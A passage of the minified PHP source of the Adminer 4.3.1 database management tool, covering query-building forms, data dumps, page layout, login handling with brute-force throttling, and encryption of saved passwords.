as$C=>$v){ksort($v["columns"]);$Mf=array();foreach($v["columns"]as$y=>$X)$Mf[]="<i>".h($X)."</i>".($v["lengths"][$y]?"(".$v["lengths"][$y].")":"").($v["descs"][$y]?" DESC":"");echo"<tr title='".h($C)."'><th>$v[type]<td>".implode(", ",$Mf)."\n";}echo"</table>\n";}function
selectColumnsPrint($M,$e){global$Zc,$ed;print_fieldset("select",lang(50),$M);$s=0;$M[""]=array();foreach($M
as$y=>$X){$X=$_GET["columns"][$y];$d=select_input(" name='columns[$s][col]' onchange='".($y!==""?"selectFieldChange(this.form)":"selectAddRow(this)").";'",$e,$X["col"]);echo"<div>".($Zc||$ed?"<select name='columns[$s][fun]' onchange='helpClose();".($y!==""?"":" this.nextSibling.nextSibling.onchange();")."'".on_help("getTarget(event).value && getTarget(event).value.replace(/ |\$/, '(') + ')'",1).">".optionlist(array(-1=>"")+array_filter(array(lang(51)=>$Zc,lang(52)=>$ed)),$X["fun"])."</select>"."($d)":$d)."</div>\n";$s++;}echo"</div></fieldset>\n";}function
selectSearchPrint($Z,$e,$w){print_fieldset("search",lang(53),$Z);foreach($w
as$s=>$v){if($v["type"]=="FULLTEXT"){echo"(<i>".implode("</i>, <i>",array_map('h',$v["columns"]))."</i>) AGAINST"," <input type='search' name='fulltext[$s]' value='".h($_GET["fulltext"][$s])."' onchange='selectFieldChange(this.form);'>",checkbox("boolean[$s]",1,isset($_GET["boolean"][$s]),"BOOL"),"<br>\n";}}$_GET["where"]=(array)$_GET["where"];reset($_GET["where"]);$Za="this.nextSibling.onchange();";for($s=0;$s<=count($_GET["where"]);$s++){list(,$X)=each($_GET["where"]);if(!$X||("$X[col]$X[val]"!=""&&in_array($X["op"],$this->operators))){echo"<div>".select_input(" name='where[$s][col]' onchange='$Za'",$e,$X["col"],"(".lang(54).")"),html_select("where[$s][op]",$this->operators,$X["op"],$Za),"<input type='search' name='where[$s][val]' value='".h($X["val"])."' onchange='".($X?"selectFieldChange(this.form)":"selectAddRow(this)").";' onkeydown='selectSearchKeydown(this, event);' onsearch='selectSearchSearch(this);'></div>\n";}}echo"</div></fieldset>\n";}function
selectOrderPrint($df,$e,$w){print_fieldset("sort",lang(55),$df);$s=0;foreach((array)$_GET["order"]as$y=>$X){if($X!=""){echo"<div>".select_input(" name='order[$s]' onchange='selectFieldChange(this.form);'",$e,$X),checkbox("desc[$s]",1,isset($_GET["desc"][$y]),lang(56))."</div>\n";$s++;}}echo"<div>".select_input(" name='order[$s]' onchange='selectAddRow(this);'",$e),checkbox("desc[$s]",1,false,lang(56))."</div>\n","</div></fieldset>\n";}function
selectLimitPrint($z){echo"<fieldset><legend>".lang(57)."</legend><div>";echo"<input type='number' name='limit' class='size' value='".h($z)."' onchange='selectFieldChange(this.form);'>","</div></fieldset>\n";}function
selectLengthPrint($uh){if($uh!==null){echo"<fieldset><legend>".lang(58)."</legend><div>","<input type='number' name='text_length' class='size' value='".h($uh)."'>","</div></fieldset>\n";}}function
selectActionPrint($w){echo"<fieldset><legend>".lang(59)."</legend><div>","<input type='submit' value='".lang(50)."'>"," <span id='noindex' title='".lang(60)."'></span>","<script type='text/javascript'>\n","var indexColumns = ";$e=array();foreach($w
as$v){$Fb=reset($v["columns"]);if($v["type"]!="FULLTEXT"&&$Fb)$e[$Fb]=1;}$e[""]=1;foreach($e
as$y=>$X)json_row($y);echo";\n","selectFieldChange(document.getElementById('form'));\n","</script>\n","</div></fieldset>\n";}function
selectCommandPrint(){return!information_schema(DB);}function
selectImportPrint(){return!information_schema(DB);}function
selectEmailPrint($lc,$e){}function
selectColumnsProcess($e,$w){global$Zc,$ed;$M=array();$cd=array();foreach((array)$_GET["columns"]as$y=>$X){if($X["fun"]=="count"||($X["col"]!=""&&(!$X["fun"]||in_array($X["fun"],$Zc)||in_array($X["fun"],$ed)))){$M[$y]=apply_sql_function($X["fun"],($X["col"]!=""?idf_escape($X["col"]):"*"));if(!in_array($X["fun"],$ed))$cd[]=$M[$y];}}return
array($M,$cd);}function
selectSearchProcess($p,$w){global$g,$x;$J=array();foreach($w
as$s=>$v){if($v["type"]=="FULLTEXT"&&$_GET["fulltext"][$s]!="")$J[]="MATCH (".implode(", ",array_map('idf_escape',$v["columns"])).") AGAINST (".q($_GET["fulltext"][$s]).(isset($_GET["boolean"][$s])?" IN BOOLEAN MODE":"").")";}foreach((array)$_GET["where"]as$X){if("$X[col]$X[val]"!=""&&in_array($X["op"],$this->operators)){$ub=" $X[op]";if(preg_match('~IN$~',$X["op"])){$rd=process_length($X["val"]);$ub.=" ".($rd!=""?$rd:"(NULL)");}elseif($X["op"]=="SQL")$ub=" $X[val]";elseif($X["op"]=="LIKE %%")$ub=" LIKE ".$this->processInput($p[$X["col"]],"%$X[val]%");elseif($X["op"]=="ILIKE %%")$ub=" ILIKE ".$this->processInput($p[$X["col"]],"%$X[val]%");elseif(!preg_match('~NULL$~',$X["op"]))$ub.=" ".$this->processInput($p[$X["col"]],$X["val"]);if($X["col"]!="")$J[]=idf_escape($X["col"]).$ub;else{$pb=array();foreach($p
as$C=>$o){$Gd=preg_match('~char|text|enum|set~',$o["type"]);if((is_numeric($X["val"])||!preg_match('~(^|[^o])int|float|double|decimal|bit~',$o["type"]))&&(!preg_match("~[\x80-\xFF]~",$X["val"])||$Gd)){$C=idf_escape($C);$pb[]=($x=="sql"&&$Gd&&!preg_match("~^utf8_~",$o["collation"])?"CONVERT($C USING ".charset($g).")":$C);}}$J[]=($pb?"(".implode("$ub OR ",$pb)."$ub)":"0");}}}return$J;}function
selectOrderProcess($p,$w){$J=array();foreach((array)$_GET["order"]as$y=>$X){if($X!="")$J[]=(preg_match('~^((COUNT\\(DISTINCT |[A-Z0-9_]+\\()(`(?:[^`]|``)+`|"(?:[^"]|"")+")\\)|COUNT\\(\\*\\))$~',$X)?$X:idf_escape($X)).(isset($_GET["desc"][$y])?" DESC":"");}return$J;}function
selectLimitProcess(){return(isset($_GET["limit"])?$_GET["limit"]:"50");}function
selectLengthProcess(){return(isset($_GET["text_length"])?$_GET["text_length"]:"100");}function
selectEmailProcess($Z,$Sc){return
false;}function
selectQueryBuild($M,$Z,$cd,$df,$z,$E){return"";}function
messageQuery($H,$vh){global$x;restart_session();$jd=&get_session("queries");$t="sql-".count($jd[$_GET["db"]]);if(strlen($H)>1e6)$H=preg_replace('~[\x80-\xFF]+$~','',substr($H,0,1e6))."\n...";$jd[$_GET["db"]][]=array($H,time(),$vh);return" <span class='time'>".@date("H:i:s")."</span> <a href='#$t' onclick=\"return !toggle('$t');\">".lang(61)."</a>"."<div id='$t' class='hidden'><pre><code class='jush-$x'>".shorten_utf8($H,1000).'</code></pre>'.($vh?" <span class='time'>($vh)</span>":'').(support("sql")?'<p><a href="'.h(str_replace("db=".urlencode(DB),"db=".urlencode($_GET["db"]),ME).'sql=&history='.(count($jd[$_GET["db"]])-1)).'">'.lang(10).'</a>':'').'</div>';}function
editFunctions($o){global$gc;$J=($o["null"]?"NULL/":"");foreach($gc
as$y=>$Zc){if(!$y||(!isset($_GET["call"])&&(isset($_GET["select"])||where($_GET)))){foreach($Zc
as$Af=>$X){if(!$Af||preg_match("~$Af~",$o["type"]))$J.="/$X";}if($y&&!preg_match('~set|blob|bytea|raw|file~',$o["type"]))$J.="/SQL";}}if($o["auto_increment"]&&!isset($_GET["select"])&&!where($_GET))$J=lang(48);return
explode("/",$J);}function
editInput($R,$o,$Ja,$Y){if($o["type"]=="enum")return(isset($_GET["select"])?"<label><input type='radio'$Ja value='-1' checked><i>".lang(8)."</i></label> ":"").($o["null"]?"<label><input type='radio'$Ja value=''".($Y!==null||isset($_GET["select"])?"":" checked")."><i>NULL</i></label> ":"").enum_input("radio",$Ja,$o,$Y,0);return"";}function
processInput($o,$Y,$r=""){if($r=="SQL")return$Y;$C=$o["field"];$J=q($Y);if(preg_match('~^(now|getdate|uuid)$~',$r))$J="$r()";elseif(preg_match('~^current_(date|timestamp)$~',$r))$J=$r;elseif(preg_match('~^([+-]|\\|\\|)$~',$r))$J=idf_escape($C)." $r $J";elseif(preg_match('~^[+-] interval$~',$r))$J=idf_escape($C)." $r ".(preg_match("~^(\\d+|'[0-9.: -]') [A-Z_]+$~i",$Y)?$Y:$J);elseif(preg_match('~^(addtime|subtime|concat)$~',$r))$J="$r(".idf_escape($C).", $J)";elseif(preg_match('~^(md5|sha1|password|encrypt)$~',$r))$J="$r($J)";return
unconvert_field($o,$J);}function
dumpOutput(){$J=array('text'=>lang(62),'file'=>lang(63));if(function_exists('gzencode'))$J['gz']='gzip';return$J;}function
dumpFormat(){return
array('sql'=>'SQL','csv'=>'CSV,','csv;'=>'CSV;','tsv'=>'TSV');}function
dumpDatabase($m){}function
dumpTable($R,$Zg,$Hd=0){if($_POST["format"]!="sql"){echo"\xef\xbb\xbf";if($Zg)dump_csv(array_keys(fields($R)));}else{if($Hd==2){$p=array();foreach(fields($R)as$C=>$o)$p[]=idf_escape($C)." $o[full_type]";$i="CREATE TABLE ".table($R)." (".implode(", ",$p).")";}else$i=create_sql($R,$_POST["auto_increment"]);set_utf8mb4($i);if($Zg&&$i){if($Zg=="DROP+CREATE"||$Hd==1)echo"DROP ".($Hd==2?"VIEW":"TABLE")." IF EXISTS ".table($R).";\n";if($Hd==1)$i=remove_definer($i);echo"$i;\n\n";}}}function
dumpData($R,$Zg,$H){global$g,$x;$me=($x=="sqlite"?0:1048576);if($Zg){if($_POST["format"]=="sql"){if($Zg=="TRUNCATE+INSERT")echo
truncate_sql($R).";\n";$p=fields($R);}$I=$g->query($H,1);if($I){$_d="";$Xa="";$Od=array();$bh="";$Hc=($R!=''?'fetch_assoc':'fetch_row');while($K=$I->$Hc()){if(!$Od){$ji=array();foreach($K
as$X){$o=$I->fetch_field();$Od[]=$o->name;$y=idf_escape($o->name);$ji[]="$y = VALUES($y)";}$bh=($Zg=="INSERT+UPDATE"?"\nON DUPLICATE KEY UPDATE ".implode(", ",$ji):"").";\n";}if($_POST["format"]!="sql"){if($Zg=="table"){dump_csv($Od);$Zg="INSERT";}dump_csv($K);}else{if(!$_d)$_d="INSERT INTO ".table($R)." (".implode(", ",array_map('idf_escape',$Od)).") VALUES";foreach($K
as$y=>$X){$o=$p[$y];$K[$y]=($X!==null?unconvert_field($o,preg_match('~(^|[^o])int|float|double|decimal~',$o["type"])&&$X!=''?$X:q($X)):"NULL");}$vg=($me?"\n":" ")."(".implode(",\t",$K).")";if(!$Xa)$Xa=$_d.$vg;elseif(strlen($Xa)+4+strlen($vg)+strlen($bh)<$me)$Xa.=",$vg";else{echo$Xa.$bh;$Xa=$_d.$vg;}}}if($Xa)echo$Xa.$bh;}elseif($_POST["format"]=="sql")echo"-- ".str_replace("\n"," ",$g->error)."\n";}}function
dumpFilename($od){return
friendly_url($od!=""?$od:(SERVER!=""?SERVER:"localhost"));}function
dumpHeaders($od,$Ae=false){$of=$_POST["output"];$Bc=(preg_match('~sql~',$_POST["format"])?"sql":($Ae?"tar":"csv"));header("Content-Type: ".($of=="gz"?"application/x-gzip":($Bc=="tar"?"application/x-tar":($Bc=="sql"||$of!="file"?"text/plain":"text/csv")."; charset=utf-8")));if($of=="gz")ob_start('ob_gzencode',1e6);return$Bc;}function
homepage(){echo'<p class="links">'.($_GET["ns"]==""&&support("database")?'<a href="'.h(ME).'database=">'.lang(64)."</a>\n":""),(support("scheme")?"<a href='".h(ME)."scheme='>".($_GET["ns"]!=""?lang(65):lang(66))."</a>\n":""),($_GET["ns"]!==""?'<a href="'.h(ME).'schema=">'.lang(67)."</a>\n":""),(support("privileges")?"<a href='".h(ME)."privileges='>".lang(68)."</a>\n":"");return
true;}function
navigation($_e){global$ia,$x,$Yb,$g;echo'<h1>
',$this->name(),' <span class="version">',$ia,'</span>
<a href="https://www.adminer.org/#download" target="_blank" id="version">',(version_compare($ia,$_COOKIE["adminer_version"])<0?h($_COOKIE["adminer_version"]):""),'</a>
</h1>
';if($_e=="auth"){$Mc=true;foreach((array)$_SESSION["pwds"]as$li=>$Ig){foreach($Ig
as$N=>$gi){foreach($gi
as$V=>$G){if($G!==null){if($Mc){echo"<p id='logins' onmouseover='menuOver(this, event);' onmouseout='menuOut(this);'>\n";$Mc=false;}$Kb=$_SESSION["db"][$li][$N][$V];foreach(($Kb?array_keys($Kb):array(""))as$m)echo"<a href='".h(auth_url($li,$N,$V,$m))."'>($Yb[$li]) ".h($V.($N!=""?"@$N":"").($m!=""?" - $m":""))."</a><br>\n";}}}}}else{if($_GET["ns"]!==""&&!$_e&&DB!=""){$g->select_db(DB);$T=table_status('',true);}echo'<script type="text/javascript" src="',h(preg_replace("~\\?.*~","",ME))."?file=jush.js&version=4.3.1",'"></script>
';if(support("sql")){echo'<script type="text/javascript">
';if($T){$ee=array();foreach($T
as$R=>$U)$ee[]=preg_quote($R,'/');echo"var jushLinks = { $x: [ '".js_escape(ME).(support("table")?"table=":"select=")."\$&', /\\b(".implode("|",$ee).")\\b/g ] };\n";foreach(array("bac","bra","sqlite_quo","mssql_bra")as$X)echo"jushLinks.$X = jushLinks.$x;\n";}echo'bodyLoad(\'',(is_object($g)?substr($g->server_info,0,3):""),'\');
</script>
';}$this->databasesPrint($_e);if(DB==""||!$_e){echo"<p class='links'>".(support("sql")?"<a href='".h(ME)."sql='".bold(isset($_GET["sql"])&&!isset($_GET["import"])).">".lang(61)."</a>\n<a href='".h(ME)."import='".bold(isset($_GET["import"])).">".lang(69)."</a>\n":"")."";if(support("dump"))echo"<a href='".h(ME)."dump=".urlencode(isset($_GET["table"])?$_GET["table"]:$_GET["select"])."' id='dump'".bold(isset($_GET["dump"])).">".lang(70)."</a>\n";}if($_GET["ns"]!==""&&!$_e&&DB!=""){echo'<a href="'.h(ME).'create="'.bold($_GET["create"]==="").">".lang(71)."</a>\n";if(!$T)echo"<p class='message'>".lang(9)."\n";else$this->tablesPrint($T);}}}function
databasesPrint($_e){global$b,$g;$l=$this->databases();echo'<form action="">
<p id="dbs">
';hidden_fields_get();$Ib=" onmousedown='dbMouseDown(event, this);' onchange='dbChange(this);'";echo"<span title='".lang(72)."'>DB</span>: ".($l?"<select name='db'$Ib>".optionlist(array(""=>"")+$l,DB)."</select>":'<input name="db" value="'.h(DB).'" autocapitalize="off">'),"<input type='submit' value='".lang(20)."'".($l?" class='hidden'":"").">\n";if($_e!="db"&&DB!=""&&$g->select_db(DB)){if(support("scheme")){echo"<br>".lang(73).": <select name='ns'$Ib>".optionlist(array(""=>"")+$b->schemas(),$_GET["ns"])."</select>";if($_GET["ns"]!="")set_schema($_GET["ns"]);}}echo(isset($_GET["sql"])?'<input type="hidden" name="sql" value="">':(isset($_GET["schema"])?'<input type="hidden" name="schema" value="">':(isset($_GET["dump"])?'<input type="hidden" name="dump" value="">':(isset($_GET["privileges"])?'<input type="hidden" name="privileges" value="">':"")))),"</p></form>\n";}function
tablesPrint($T){echo"<ul id='tables' onmouseover='menuOver(this, event);' onmouseout='menuOut(this);'>\n";foreach($T
as$R=>$P){echo'<li><a href="'.h(ME).'select='.urlencode($R).'"'.bold($_GET["select"]==$R||$_GET["edit"]==$R,"select").">".lang(74)."</a> ";$C=$this->tableName($P);echo(support("table")||support("indexes")?'<a href="'.h(ME).'table='.urlencode($R).'"'.bold(in_array($R,array($_GET["table"],$_GET["create"],$_GET["indexes"],$_GET["foreign"],$_GET["trigger"])),(is_view($P)?"view":"structure"))." title='".lang(40)."'>$C</a>":"<span>$C</span>")."\n";}echo"</ul>\n";}}$b=(function_exists('adminer_object')?adminer_object():new
Adminer);if($b->operators===null)$b->operators=$Ye;function
page_header($yh,$n="",$Wa=array(),$zh=""){global$ca,$ia,$b,$Yb,$x;page_headers();if(is_ajax()&&$n){page_messages($n);exit;}$_h=$yh.($zh!=""?": $zh":"");$Ah=strip_tags($_h.(SERVER!=""&&SERVER!="localhost"?h(" - ".SERVER):"")." - ".$b->name());echo'<!DOCTYPE html>
<html lang="',$ca,'" dir="',lang(75),'">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="Content-Script-Type" content="text/javascript">
<meta name="robots" content="noindex">
<meta name="referrer" content="origin-when-crossorigin">
<title>',$Ah,'</title>
<link rel="stylesheet" type="text/css" href="',h(preg_replace("~\\?.*~","",ME))."?file=default.css&version=4.3.1",'">
<script type="text/javascript" src="',h(preg_replace("~\\?.*~","",ME))."?file=functions.js&version=4.3.1",'"></script>
';if($b->head()){echo'<link rel="shortcut icon" type="image/x-icon" href="',h(preg_replace("~\\?.*~","",ME))."?file=favicon.ico&version=4.3.1",'">
<link rel="apple-touch-icon" href="',h(preg_replace("~\\?.*~","",ME))."?file=favicon.ico&version=4.3.1",'">
';if(file_exists("adminer.css")){echo'<link rel="stylesheet" type="text/css" href="adminer.css">
';}}echo'
<body class="',lang(75),' nojs" onkeydown="bodyKeydown(event);" onclick="bodyClick(event);"',(isset($_COOKIE["adminer_version"])?"":" onload=\"verifyVersion('$ia');\"");?>>
<script type="text/javascript">
document.body.className = document.body.className.replace(/ nojs/, ' js');
var offlineMessage = '<?php echo
js_escape(lang(76)),'\';
</script>
<div id="help" class="jush-',$x,' jsonly hidden" onmouseover="helpOpen = 1;" onmouseout="helpMouseout(this, event);"></div>
<div id="content">
';if($Wa!==null){$_=substr(preg_replace('~\b(username|db|ns)=[^&]*&~','',ME),0,-1);echo'<p id="breadcrumb"><a href="'.h($_?$_:".").'">'.$Yb[DRIVER].'</a> » ';$_=substr(preg_replace('~\b(db|ns)=[^&]*&~','',ME),0,-1);$N=(SERVER!=""?h(SERVER):lang(32));if($Wa===false)echo"$N\n";else{echo"<a href='".($_?h($_):".")."' accesskey='1' title='Alt+Shift+1'>$N</a> » ";if($_GET["ns"]!=""||(DB!=""&&is_array($Wa)))echo'<a href="'.h($_."&db=".urlencode(DB).(support("scheme")?"&ns=":"")).'">'.h(DB).'</a> » ';if(is_array($Wa)){if($_GET["ns"]!="")echo'<a href="'.h(substr(ME,0,-1)).'">'.h($_GET["ns"]).'</a> » ';foreach($Wa
as$y=>$X){$Pb=(is_array($X)?$X[1]:h($X));if($Pb!="")echo"<a href='".h(ME."$y=").urlencode(is_array($X)?$X[0]:$X)."'>$Pb</a> » ";}}echo"$yh\n";}}echo"<h2>$_h</h2>\n","<div id='ajaxstatus' class='jsonly hidden'></div>\n";restart_session();page_messages($n);$l=&get_session("dbs");if(DB!=""&&$l&&!in_array(DB,$l,true))$l=null;stop_session();define("PAGE_HEADER",1);}function
page_headers(){global$b;header("Content-Type: text/html; charset=utf-8");header("Cache-Control: no-cache");if($b->headers()){header("X-Frame-Options: deny");header("X-XSS-Protection: 0");}}function
page_messages($n){$ai=preg_replace('~^[^?]*~','',$_SERVER["REQUEST_URI"]);$we=$_SESSION["messages"][$ai];if($we){echo"<div class='message'>".implode("</div>\n<div class='message'>",$we)."</div>\n";unset($_SESSION["messages"][$ai]);}if($n)echo"<div class='error'>$n</div>\n";}function
page_footer($_e=""){global$b,$Dh;echo'</div>
';switch_lang();if($_e!="auth"){echo'<form action="" method="post">
<p class="logout">
<input type="submit" name="logout" value="',lang(77),'" id="logout">
<input type="hidden" name="token" value="',$Dh,'">
</p>
</form>
';}echo'<div id="menu">
';$b->navigation($_e);echo'</div>
<script type="text/javascript">setupSubmitHighlight(document);</script>
';}function
int32($Ce){while($Ce>=2147483648)$Ce-=4294967296;while($Ce<=-2147483649)$Ce+=4294967296;return(int)$Ce;}function
long2str($W,$qi){$vg='';foreach($W
as$X)$vg.=pack('V',$X);if($qi)return
substr($vg,0,end($W));return$vg;}function
str2long($vg,$qi){$W=array_values(unpack('V*',str_pad($vg,4*ceil(strlen($vg)/4),"\0")));if($qi)$W[]=strlen($vg);return$W;}function
xxtea_mx($wi,$vi,$ch,$Kd){return
int32((($wi>>5&0x7FFFFFF)^$vi<<2)+(($vi>>3&0x1FFFFFFF)^$wi<<4))^int32(($ch^$vi)+($Kd^$wi));}function
encrypt_string($Xg,$y){if($Xg=="")return"";$y=array_values(unpack("V*",pack("H*",md5($y))));$W=str2long($Xg,true);$Ce=count($W)-1;$wi=$W[$Ce];$vi=$W[0];$Tf=floor(6+52/($Ce+1));$ch=0;while($Tf-->0){$ch=int32($ch+0x9E3779B9);$fc=$ch>>2&3;for($pf=0;$pf<$Ce;$pf++){$vi=$W[$pf+1];$Be=xxtea_mx($wi,$vi,$ch,$y[$pf&3^$fc]);$wi=int32($W[$pf]+$Be);$W[$pf]=$wi;}$vi=$W[0];$Be=xxtea_mx($wi,$vi,$ch,$y[$pf&3^$fc]);$wi=int32($W[$Ce]+$Be);$W[$Ce]=$wi;}return
long2str($W,false);}function
decrypt_string($Xg,$y){if($Xg=="")return"";if(!$y)return
false;$y=array_values(unpack("V*",pack("H*",md5($y))));$W=str2long($Xg,false);$Ce=count($W)-1;$wi=$W[$Ce];$vi=$W[0];$Tf=floor(6+52/($Ce+1));$ch=int32($Tf*0x9E3779B9);while($ch){$fc=$ch>>2&3;for($pf=$Ce;$pf>0;$pf--){$wi=$W[$pf-1];$Be=xxtea_mx($wi,$vi,$ch,$y[$pf&3^$fc]);$vi=int32($W[$pf]-$Be);$W[$pf]=$vi;}$wi=$W[$Ce];$Be=xxtea_mx($wi,$vi,$ch,$y[$pf&3^$fc]);$vi=int32($W[0]-$Be);$W[0]=$vi;$ch=int32($ch-0x9E3779B9);}return
long2str($W,true);}$g='';$id=$_SESSION["token"];if(!$id)$_SESSION["token"]=rand(1,1e6);$Dh=get_token();$Bf=array();if($_COOKIE["adminer_permanent"]){foreach(explode(" ",$_COOKIE["adminer_permanent"])as$X){list($y)=explode(":",$X);$Bf[$y]=$X;}}function
add_invalid_login(){global$b;$Kc=get_temp_dir()."/adminer.invalid";$Xc=@fopen($Kc,"r+");if(!$Xc){$Xc=@fopen($Kc,"w");if(!$Xc)return;}flock($Xc,LOCK_EX);$Cd=unserialize(stream_get_contents($Xc));$vh=time();if($Cd){foreach($Cd
as$Dd=>$X){if($X[0]<$vh)unset($Cd[$Dd]);}}$Bd=&$Cd[$b->bruteForceKey()];if(!$Bd)$Bd=array($vh+30*60,0);$Bd[1]++;$Gg=serialize($Cd);rewind($Xc);fwrite($Xc,$Gg);ftruncate($Xc,strlen($Gg));flock($Xc,LOCK_UN);fclose($Xc);}$Ka=$_POST["auth"];if($Ka){$Cd=unserialize(@file_get_contents(get_temp_dir()."/adminer.invalid"));$Bd=$Cd[$b->bruteForceKey()];$Ie=($Bd[1]>30?$Bd[0]-time():0);if($Ie>0)auth_error(lang(78,ceil($Ie/60)));session_regenerate_id();$li=$Ka["driver"];$N=$Ka["server"];$V=$Ka["username"];$G=(string)$Ka["password"];$m=$Ka["db"];set_password($li,$N,$V,$G);$_SESSION["db"][$li][$N][$V][$m]=true;if($Ka["permanent"]){$y=base64_encode($li)."-".base64_encode($N)."-".base64_encode($V)."-".base64_encode($m);$Nf=$b->permanentLogin(true);$Bf[$y]="$y:".base64_encode($Nf?encrypt_string($G,$Nf):"");cookie("adminer_permanent",implode(" ",$Bf));}if(count($_POST)==1||DRIVER!=$li||SERVER!=$N||$_GET["username"]!==$V||DB!=$m)redirect(auth_url($li,$N,$V,$m));}elseif($_POST["logout"]){if($id&&!verify_token()){page_header(lang(77),lang(79));page_footer("db");exit;}else{foreach(array("pwds","db","dbs","queries")as$y)set_session($y,null);unset_permanent();redirect(substr(preg_replace('~\b(username|db|ns)=[^&]*&~','',ME),0,-1),lang(80));}}elseif($Bf&&!$_SESSION["pwds"]){session_regenerate_id();$Nf=$b->permanentLogin();foreach($Bf
as$y=>$X){list(,$hb)=explode(":",$X);list($li,$N,$V,$m)=array_map('base64_decode',explode("-",$y));set_password($li,$N,$V,decrypt_string(base64_decode($hb),$Nf));$_SESSION["db"][$li][$N][$V][$m]=true;}}function
unset_permanent(){global$Bf;foreach($Bf
as$y=>$X){list($li,$N,$V,$m)=array_map('base64_decode',explode("-",$y));if($li==DRIVER&&$N==SERVER&&$V==$_GET["username"]&&$m==DB)unset($Bf[$y]);}cookie("adminer_permanent",implode(" ",$Bf));}function
auth_error($n){global$b,$id;$Jg=session_name();if(isset($_GET["username"])){header("HTTP/1.1 403 Forbidden");if(($_COOKIE[$Jg]||$_GET[$Jg])&&!$id)$n=lang(81);else{add_invalid_login();$G=get_password();if($G!==null){if($G===false)$n.='<br>'.lang(82,'<code>permanentLogin()</code>');set_password(DRIVER,SERVER,$_GET["username"],null);}unset_permanent();}}if(!$_COOKIE[$Jg]&&$_GET[$Jg]&&ini_bool("session.use_only_cookies"))$n=lang(83);$F=session_get_cookie_params();cookie("adminer_key",($_COOKIE["adminer_key"]?$_COOKIE["adminer_key"]:rand_string()),$F["lifetime"]);page_header(lang(36),$n,null);echo"<form action='' method='post'>\n";$b->loginForm();echo"<div>";hidden_fields($_POST,array("auth"));echo"</div>\n","</form>\n";page_footer("auth");exit;}if(isset($_GET["username"])){if(!class_exists("Min_DB")){unset($_SESSION["pwds"][DRIVER]);unset_permanent();page_header(lang(84),lang(85,implode(", ",$Hf)),false);page_footer("auth");exit;}$g=connect();}$Xb=new
Min_Driver($g);if(!is_object($g)||($fe=$b->login($_GET["username"],get_password()))!==true)auth_error((is_string($g)?h($g):(is_string($fe)?$fe:lang(86))));if($Ka&&$_POST["token"])$_POST["token"]=$Dh;$n='';if($_POST){if(!verify_token()){$xd="max_input_vars";$qe=ini_get($xd);if(extension_loaded("suhosin")){foreach(array("suhosin.request.max_vars","suhosin.post.max_vars")as$y){$X=ini_get($y);if($X&&(!$qe||$X<$qe)){$xd=$y;$qe=$X;}}}$n=(!$_POST["token"]&&$qe?lang(87,"'$xd'"):lang(79).' '.lang(88));}}elseif($_SERVER["REQUEST_METHOD"]=="POST"){$n=lang(89,"'post_max_size'");if(isset($_GET["sql"]))$n.=' '.lang(90);}if(!ini_bool("session.use_cookies")||@ini_set("session.use_cookies",false)!==false)session_write_close();function
select($I,$h=null,$gf=array(),$z=0){global$x;$ee=array();$w=array();$e=array();$Ta=array();$Rh=array();$J=array();odd('');for($s=0;(!$z||$s<$z)&&($K=$I->fetch_row());$s++){if(!$s){echo"<table cellspacing='0' class='nowrap'>\n","<thead><tr>";for($Jd=0;$Jd<count($K);$Jd++){$o=$I->fetch_field();$C=$o->name;$ff=$o->orgtable;$ef=$o->orgname;$J[$o->table]=$ff;if($gf&&$x=="sql")$ee[$Jd]=($C=="table"?"table=":($C=="possible_keys"?"indexes=":null));elseif($ff!=""){if(!isset($w[$ff])){$w[$ff]=array();foreach(indexes($ff,$h)as$v){if($v["type"]=="PRIMARY"){$w[$ff]=array_flip($v["columns"]);break;}}$e[$ff]=$w[$ff];}if(isset($e[$ff][$ef])){unset($e[$ff][$ef]);$w[$ff][$ef]=$Jd;$ee[$Jd]=$ff;}}if($o->charsetnr==63)$Ta[$Jd]=true;$Rh[$Jd]=$o->type;echo"<th".($ff!=""||$o->name!=$ef?" title='".h(($ff!=""?"$ff.":"").$ef)."'":"").">".h($C).($gf?doc_link(array('sql'=>"explain-output.html#explain_".strtolower($C))):"");}echo"</thead>\n";}echo"<tr".odd().">";foreach($K
as$y=>$X){if($X===null)$X="<i>NULL</i>";elseif($Ta[$y]&&!is_utf8($X))$X="<i>".lang(44,strlen($X))."</i>";elseif(!strlen($X))$X=" ";else{$X=h($X);if($Rh[$y]==254)$X="<code>$X</code>";}if(isset($ee[$y])&&!$e[$ee[$y]]){if($gf&&$x=="sql"){$R=$K[array_search("table=",$ee)];$_=$ee[$y].urlencode($gf[$R]!=""?$gf[$R]:$R);}else{$_="edit=".urlencode($ee[$y]);foreach($w[$ee[$y]]as$lb=>$Jd)$_.="&where".urlencode("[".bracket_escape($lb)."]")."=".urlencode($K[$Jd]);}$X="<a href='".h(ME.$_)."'>$X</a>";}echo"<td>$X";}}echo($s?"</table>":"<p class='message'>".lang(12))."\n";return$J;}function
referencable_primary($Cg){$J=array();foreach(table_status('',true)as$gh=>$R){if($gh!=$Cg&&fk_support($R)){foreach(fields($gh)as$o){if($o["primary"]){if($J[$gh]){unset($J[$gh]);break;}$J[$gh]=$o;}}}}return$J;}function
textarea($C,$Y,$L=10,$pb=80){global$x;echo"<textarea name='$C' rows='$L' cols='$pb' class='sqlarea jush-$x' spellcheck='false' wrap='off'>";if(is_array($Y)){foreach($Y
as$X)echo
h($X[0])."\n\n\n";}else
echo
h($Y);echo"</textarea>";}function
edit_type($y,$o,$ob,$Tc=array()){global$Yg,$Rh,$Yh,$Te;$U=$o["type"];echo'<td><select name="',h($y),'[type]" class="type" onfocus="lastType = selectValue(this);" onchange="editingTypeChange(this);"',on_help("getTarget(event).value",1),' aria-labelledby="label-type">';if($U&&!isset($Rh[$U])&&!isset($Tc[$U]))array_unshift($Yg,$U);if($Tc)$Yg[lang(91)]=$Tc;echo
optionlist($Yg,$U),'</select>
<td><input name="',h($y),'[length]" value="',h($o["length"]),'" size="3" onfocus="editingLengthFocus(this);"',(!$o["length"]&&preg_match('~var(char|binary)$~',$U)?" class='required'":""),' onchange="editingLengthChange(this);" onkeyup="this.onchange();" aria-labelledby="label-length"><td class="options">';echo"<select name='".h($y)."[collation]'".(preg_match('~(char|text|enum|set)$~',$U)?"":" class='hidden'").'><option value="">('.lang(92).')'.optionlist($ob,$o["collation"]).'</select>',($Yh?"<select name='".h($y)."[unsigned]'".(!$U||preg_match('~((^|[^o])int|float|double|decimal)$~',$U)?"":" class='hidden'").'><option>'.optionlist($Yh,$o["unsigned"]).'</select>':''),(isset($o['on_update'])?"<select name='".h($y)."[on_update]'".(preg_match('~timestamp|datetime~',$U)?"":" class='hidden'").'>'.optionlist(array(""=>"(".lang(93).")","CURRENT_TIMESTAMP"),$o["on_update"]).'</select>':''),($Tc?"<select 